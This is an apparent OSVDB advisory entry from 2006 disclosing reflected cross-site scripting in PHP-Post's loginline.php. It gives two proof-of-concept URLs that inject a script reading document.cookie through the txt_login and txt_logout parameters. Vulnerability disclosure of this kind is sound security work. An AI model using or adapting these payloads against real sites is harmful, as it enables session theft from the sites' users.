PHP-Post loginline.php Multiple Variable XSS

2006-09-16T12:18:55
ID OSVDB:28971
Type osvdb
Reporter HACKERS PAL(security@soqor.net)
Modified 2006-09-16T12:18:55

Description

Manual Testing Notes

Authenticated: /loginline.php?txt_logout=<script>alert(document.cookie);</script> Pre-authentication: /loginline.php?txt_login=<script>alert(document.cookie);</script>

References:

Vendor URL: http://www.php-post.co.uk/ Secunia Advisory ID:22014 Related OSVDB ID: 28972 Related OSVDB ID: 28968 Related OSVDB ID: 28970 Related OSVDB ID: 28973 Related OSVDB ID: 28964 Related OSVDB ID: 28969 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0290.html